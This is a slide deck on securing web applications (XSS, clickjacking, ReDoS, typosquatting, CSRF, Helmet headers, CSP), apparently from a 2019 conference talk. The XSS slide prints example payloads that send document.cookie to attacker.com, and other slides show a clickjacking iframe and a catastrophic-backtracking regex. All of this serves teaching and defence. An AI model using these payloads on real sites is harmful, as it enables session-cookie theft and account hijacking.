A Practical Guide to Securing Modern Web Applications

1. A Practical Guide to Securing
Modern Web Applications
September, 2019
@manishekhawat
Manish.Shekhawat@publicissapient.com

2. Why security is Important?
Security is not just a NFR of an Application. If
breached, it could cost sensitive data leaks, money,
jobs, brand reputation and many times the whole
Business.
3

3. Take-aways
4

4. Include Security considerations as part of System
Architecture Design. Avoid security specific flaws in
Architecture as the impact of vulnerability in
architecture and cost of fixing them is high.
5

5. Validate and Sanitize Inputs
Encode and Encrypt data during transit
6

6. Your Application should not trust anything – Build
a Pessimist Application to make it secure
7

7. Use proven libraries for session management, don’t
invent one unless you are a security and session
management expert
8

8. Don’t Leak Sensitive PII information in Logs
9

9. Set Appropriate Headers
10

10. Sample Modern Universal JS Application Architecture
11* Delete This Page Before Circulation
Message Broker
API Gateway
App
Server

11. Types of Flaws in System leading
to Security Breach
1. Architectural/Implementation
Design Flaws
2. Engineering Ignorance
12
Unauthenticate
d APIs and
Incorrect
Authorization
Poorly handled
exception
scenarios
HTTP Verbs not
followed as per
requirements
Custom
Encryption
Algorithm
Storing sensitive
data in browsers
SPOF
Validation
Issues
Logging
Sensitive Data
Unaware of
tools &
methods related
to Security
Not considering
Security while
development
Unaware of
Attacks &
Vectors
Ignoring
Security Audit
Reports

12. Types of Vulnerabilities and Attacks
13

13. Few Common Vulnerabilities and
Attacks
14
XSS
Click-
Jacking
ReDoS
Typo-
squatting
CSRF
Solution:
1. Sanitize and validate form and querystring
Inputs
2. Frame Busting by setting top.location or X-
Frame-Options
3. Keep Regex less greedy by limiting the
number of characters or optimized Regex
4. Verify and Avoid usage of these package
altogether.
5. Token Header/Cookie for Authorization over
Authentication

14. XSS – Cross Site Scripting
1. Stored XSS
Input taken from User through Form Input
and saved in any type of Database.
2. Reflected XSS
A reflected XSS vulnerability happens
the user input from a URL or POST data is
reflected on the page without being
stored.
15
//Stored XSS
User name :
Manish<script>document.locatio
n='https://attacker.com/?cooki
e='+ document.cookie</script>
//Reflected XSS
https://example.com/news?q=<sc
ript>document.location='https:
//attacker.com/log.php?c=' +
document.cookie</script>
Solution:
Sanitize and validate form and
querystring Inputs

15. Click-Jacking
A malicious technique of tricking a
user into clicking on something
different from what the user perceives
16
<style>
iframe {
position: absolute;
top:0; left:-20px;
opacity: 0;
z-index: 1;
}
</style>
<div>Click to get rich now:</div>
<iframe
src="/clickjacking/facebooklike.h
tml"></iframe>
<button>Click here!</button>
Solution:
Frame Busting by setting top.location or
X-Frame-Options

16. Regular expression Denial of
Service
ReDoS exploits the fact that most
Regular Expression implementations
may reach extreme situations that
cause them to work very slowly.
17
console.time('mark');
/A(B|C+)+D/.test('ACCCCCC
CCCCCCCCCP');
console.timeEnd('mark');
Solution:
Keep Regex less greedy by limiting the
number of characters or optimized
Regex

17. Typo-squatting
Malicious similar named packages
These packages carry similar names
an original package, offer all the
functionality of their original, but also
include a code snippet that sends all
your environment variables to a
remote server controlled by malicious
operators when your code is running.
18
crossenv - v6.1.1 - Run
scripts that set and use
environment variables across
platforms
cross-env - v5.0.1
Solution:
Verify and Avoid usage of these
package altogether.

18. Other Security Attacks
1. XSS through CSS
2. Directory Traversal Attack via Web
App Code
3. SQL Injection
4. Information Leak through Logs
19
Solution:
1. Apply CSP – Content Security
Policy, Input Validation
2. Keep Web Server version Updated.
Filter User & Endpoint Inputs
3. Prepared Statements and
Sanitize/Escape Inputs
4. Save yourself by not saving
sensitive information in logs

19. Finding Vulnerabilities
1. https://docs.npmjs.com/getting-
started/running-a-security-audit
2. https://chrome.google.com/webstore/detail/reti
rejs/moibopkbhjceeedibkbkbchbjnkadmom
3. https://observatory.mozilla.org/
4. https://www.npmjs.com/package/zaproxy
5. https://www.owasp.org/images/7/72/OWASP_T
op_10-2017_%28en%29.pdf.pdf
6. https://wpscan.org/
7. https://portswigger.net/burp
8. http://w3af.org/
9. https://snyk.io/ 20
npm audit retire.js
Observatory
by Mozilla
OWASP ZAP
(Zed Attack
Proxy) API
OWASP Top
10
WPScan
Burp Suite W3AF Snyk
SAST & DAST
Check
security
headers
more...

20. Best Practices
1. Use Linting & ‘use strict’
2. Create and Use Secure & HTTPOnly
Cookies
3. Remove Unnecessary Headers
4. Whitelist domains for CORS
5. Sanitize Input
21
npm install -g eslint
‘use strict’
Set-Cookie: <name>=<value>[; <Max-
Age>=<age>] [; expires=<date>][;
domain=<domain_name>] [;
path=<some_path>][; secure][;
HttpOnly]
app.disable('x-powered-by');
Access-Control-Allow-Origin:
https://publicissapient.com
https://mozilla.org,
https://microsoft.com,
https://apple.com

21. Setting Appropriate Headers to secure your App
22

22. helmetjs.github.io – Helmet for your
Headers
Helmet makes securing HTTP headers
easy for developers. Helmet is a
collection of 13 Node modules that
interface with Express. Each module
provides configuration options for
securing different HTTP headers.
23
const express = require('express')
const helmet = require('helmet')
const app = express()
app.use(helmet())

23. Content-Security-Policy
Header which can help protect against
malicious injection of JavaScript, CSS,
plugins, and more.
You don’t want anyone putting
anything on your webpages that you
don’t expect. Whitelist things that are
allowed to be on your page
24
const csp = require('helmet-csp')
app.use(csp({
directives: {
defaultSrc: ["'self'"],
styleSrc: ["'self’”,
‘cdn.bootstrap.com’]
}
}))

24. X-Permitted-Cross-Domain-Policies
Helmet’s crossdomain middleware prevents
Adobe Flash and Adobe Acrobat from loading
content on your site.
The X-Permitted-Cross-Domain-Policies header
tells clients like Flash and Acrobat what cross-
domain policies they can use. If you don’t want
them to load data from your domain, set the
header’s value to none
25
const permittedCrossDomainPolicies =
require('helmet-crossdomain')
app.use(permittedCrossDomainPolicies())

25. X-DNS-Prefetch-Control
This middleware lets you disable
browsers’ DNS prefetching by setting
the X-DNS-Prefetch-Control header.
Browsers can start these DNS
requests before the user even clicks a
link or loads a resource from
somewhere. This improves
performance when the user clicks the
link, but has privacy implications for
users. It can appear as if a user is
visiting things they aren’t visiting. 26
const helmet = require('helmet')
// Sets "X-DNS-Prefetch-Control:
off".
app.use(helmet.dnsPrefetchControl
())

26. Expect-CT
The Expect-CT HTTP header tells browsers to
expect Certificate Transparency.
Certificate Transparency makes it possible to
detect SSL certificates that have been
mistakenly issued by a certificate authority or
maliciously acquired from an otherwise
unimpeachable certificate authority.
These flaws can facilitate a wide range of security
attacks, such as website spoofing, server
impersonation, and man-in-the-middle attacks.
27
const expectCt = require('expect-ct')
app.use(expectCt({
enforce: true,
maxAge: 30,
reportUri: 'http://example.com/report'
}))

27. Feature-Policy
Helmet’s featurePolicy middleware
lets you restrict which browser
features can be used. For example,
you can disable fullscreen or vibration
APIs.
28
const helmet = require('helmet')
app.use(helmet.featurePolicy({
features: {
fullscreen: ["'self'"],
vibrate: ["'none'"],
payment:
['example.com’],
syncXhr: ["'none’”]
}
}))

28. X-Frame-Options
This middleware Frameguard
mitigates clickjacking attacks by
setting the X-Frame-Options header.
When browsers load iframes, they’ll
check the value of the X-Frame-
Options header and abort loading if it’s
not allowed.
29
// Don't allow me to be in ANY frames.
app.use(frameguard({ action: 'deny' }))
// Only let me be framed by people of the
same origin.
app.use(frameguard({ action: 'sameorigin'
}))
// Allow from a specific host.
app.use(frameguard({
action: 'allow-from’,
domain: 'http://publicissapient.com'
}))

29. Strict-Transport-Security
The Strict-Transport-Security HTTP
header tells browsers to stick with
HTTPS and never visit the insecure
HTTP version.
Note that the header won’t tell users
on HTTP to switch to HTTPS, it will
just tell HTTPS users to stick around.
30
const helmet = require('helmet')
// Sets "Strict-Transport-Security:
max-age=5184000;
includeSubDomains".
const sixtyDaysInSeconds =
5184000
app.use(helmet.hsts({
maxAge: sixtyDaysInSeconds
}))

30. X-Content-Type-Options
A user could upload an image with
the .jpg file extension but its contents
are actually HTML. Visiting that image
could cause the browser to “run” the
HTML page, which could contain
malicious JavaScript!
The X-Content-Type-Options header
tells browsers not to sniff MIME
types. When this header is set
to nosniff, browsers won’t sniff the
MIME type—they will trust what the
server says and block the resource if
it’s wrong.
31
const helmet = require('helmet')
// Sets "X-Content-Type-Options:
nosniff".
app.use(helmet.noSniff())

31. Referrer-Policy
The Referer HTTP Header is typically
set by web browsers to tell a server
where it’s coming from.
This can have privacy implications—
websites can see where users are
coming from.
The new Referrer-Policy HTTP
header lets authors control how
browsers set the Referer header.
32
const helmet = require('helmet')
// Sets "Referrer-Policy: same-
origin".
app.use(helmet.referrerPolicy({
policy: 'same-origin' }))
// Sets "Referrer-Policy: no-
referrer".
app.use(helmet.referrerPolicy({
policy: 'no-referrer' }))

32. X-XSS-Protection
This tells browsers to detect and
block reflected XSS.
33
const helmet = require('helmet')
// Sets "X-XSS-Protection: 1;
mode=block".
app.use(helmet.xssFilter())

33. Cross Site Request Forgery
34

34. CSRF – Cross Site Request Forgery
Attack
Cross-site request forgery, also
known as one-click
attack or session riding and
abbreviated as CSRF is a type of
malicious exploit of a website where
unauthorized commands are
transmitted from a user that the web
application trusts.
Unlike cross-site scripting (XSS),
which exploits the trust a user has for
a particular site, CSRF exploits the
trust that a site has in a user's
browser.
35
2. Attacker :
Embeds the
request into a
hyperlink and
sends it to
visitor who is
logged in
3. Visitor :
Clicks the link,
unknowingly
sending the
request to the
website
4. Website :
Validates the
request and
transfer funds
from visitor's
account to
attacker’s
account
1. Attacker :
Forges a
request for fund
transfer to a
website

35. CSURF - Node.js CSRF protection
middleware
Create a middleware for CSRF token
creation and validation. This token is
validated against the visitor's session
or csrf cookie.
Token Header/Cookie for
Authorization over Authentication.
36
<form action="/process" method="POST">
<input type="hidden" name="_csrf"
value="{{csrfToken}}">
<input type="text” name="movieName">
<button type="submit">Save</button>
</form>
////////////////////////////////////////
var csrf = require('csurf’)
var csrfProtection = csrf({ cookie: true
})
app.get('/form', csrfProtection, function
(req, res) {
// pass the csrfToken to the view
res.render('send', { csrfToken:
req.csrfToken() })
})
app.post('/process’, parseForm,
csrfProtection, function (req, res) {
res.send('data processing’)
})

36. Sanitize Input
To filter input from users to prevent
XSS attacks.
37
https://www.npmjs.com/package/xss
const filterXSS = new
xss.FilterXSS();
const applyXSSFilterRoute = app => {
app.use('*', (req, res, next) => {
req.query =
filterXSS.process(req.query);
req.headers =
filterXSS.process(req.headers);
req.url =
filterXSS.process(req.url);
next();
});
};
applyXSSFilterRoute(app);

37. Auditing Application Architecture Security
38

38. Auditing Application Architecture
Security
1. Done by Security Experts
2. Involve System Architects
3. Threat Modeling Methodologies
1. Data Flow Diagrams
2. Control Flow Diagrams
4. Tools
1. Burp Suite or similar tool
2. Manual Code Audit
39
Refer: https://www.owasp.org/index.php/CRV2_AppThreatModeling

39. Security is part of Developer’s DNA
40

40. thank you
copyright publicis sapient | confidential
@manishekhawat
@PubSapientIndia